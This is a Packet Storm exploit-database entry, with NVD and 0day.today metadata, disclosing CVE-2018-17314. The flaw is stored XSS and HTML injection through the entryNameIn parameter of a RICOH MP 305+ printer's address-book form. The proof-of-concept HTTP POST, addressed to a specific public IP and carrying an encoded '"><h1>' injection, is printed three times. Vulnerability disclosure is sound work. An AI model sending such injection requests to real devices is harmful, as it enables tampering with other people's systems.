ID PACKETSTORM:149501
Type packetstorm
Reporter Ismail Tasdelen
Modified 2018-09-25T00:00:00
Description
`# Exploit Title: RICOH MP 305+ Printer - HTML Injection and Stored XSS
# Date: 2018-09-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html
# Software : RICOH Printer
# Product Version: MP 305+
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection and Stored XSS
# CVE : CVE-2018-17314
On the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 210.177.53.211
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/plain, */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://210.177.53.211/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=125043496912702; cookieOnOffChecker=on; wimsesid=182442825
Connection: close
mode=ADDUSER&step=BASE&wimToken=2128826648&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
`
{"id": "PACKETSTORM:149501", "type": "packetstorm", "bulletinFamily": "exploit", "title": "RICOH MP 305+ Printer Cross Site Scripting", "description": "", "published": "2018-09-25T00:00:00", "modified": "2018-09-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/149501/RICOH-MP-305-Printer-Cross-Site-Scripting.html", "reporter": "Ismail Tasdelen", "references": [], "cvelist": ["CVE-2018-17314"], "lastseen": "2018-09-25T10:08:56", "viewCount": 22, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2018-09-25T10:08:56", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-17314"]}, {"type": "zdt", "idList": ["1337DAY-ID-31172"]}], "modified": "2018-09-25T10:08:56", "rev": 2}, "vulnersScore": 4.5}, "sourceHref": "https://packetstormsecurity.com/files/download/149501/CVE-2018-17314.txt", "sourceData": "`# Exploit Title: RICOH MP 305+ Printer - HTML Injection and Stored XSS \n# Date: 2018-09-21 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.ricoh.com/ \n# Hardware Link : https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html \n# Software : RICOH Printer \n# Product Version: MP 305+ \n# Vulernability Type : Code Injection \n# Vulenrability : HTML Injection and Stored XSS \n# CVE : CVE-2018-17314 \n \nOn the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi. \n \n# HTTP POST Request : \n \nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 \nHost: 210.177.53.211 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 \nAccept: text/plain, */* \nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding: gzip, deflate \nReferer: http://210.177.53.211/web/entry/en/address/adrsList.cgi \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 193 \nCookie: risessionid=125043496912702; cookieOnOffChecker=on; wimsesid=182442825 \nConnection: close \n \nmode=ADDUSER&step=BASE&wimToken=2128826648&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \n \n`\n"}
{"cve": [{"lastseen": "2020-10-03T13:20:16", "description": "On the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-09-26T22:29:00", "title": "CVE-2018-17314", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17314"], "modified": "2018-11-15T18:48:00", "cpe": ["cpe:/o:ricoh:mp_305\\+_firmware:-"], "id": "CVE-2018-17314", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17314", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:ricoh:mp_305\\+_firmware:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-09-25T16:11:01", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-09-25T00:00:00", "title": "RICOH MP 305+ Printer Cross Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17314"], "modified": "2018-09-25T00:00:00", "id": "1337DAY-ID-31172", "href": "https://0day.today/exploit/description/31172", "sourceData": "# Exploit Title: RICOH MP 305+ Printer - HTML Injection and Stored XSS\r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://www.ricoh.com/\r\n# Hardware Link : https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html\r\n# Software : RICOH Printer\r\n# Product Version: MP 305+\r\n# Vulernability Type : Code Injection\r\n# Vulenrability : HTML Injection and Stored XSS\r\n# CVE : CVE-2018-17314\r\n\r\nOn the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.\r\n\r\n# HTTP POST Request :\r\n\r\nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1\r\nHost: 210.177.53.211\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\r\nAccept: text/plain, */*\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://210.177.53.211/web/entry/en/address/adrsList.cgi\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 193\r\nCookie: risessionid=125043496912702; cookieOnOffChecker=on; wimsesid=182442825\r\nConnection: close\r\n\r\nmode=ADDUSER&step=BASE&wimToken=2128826648&entryIndexIn=00002&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1\r\n\n\n# 0day.today [2018-09-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31172"}]}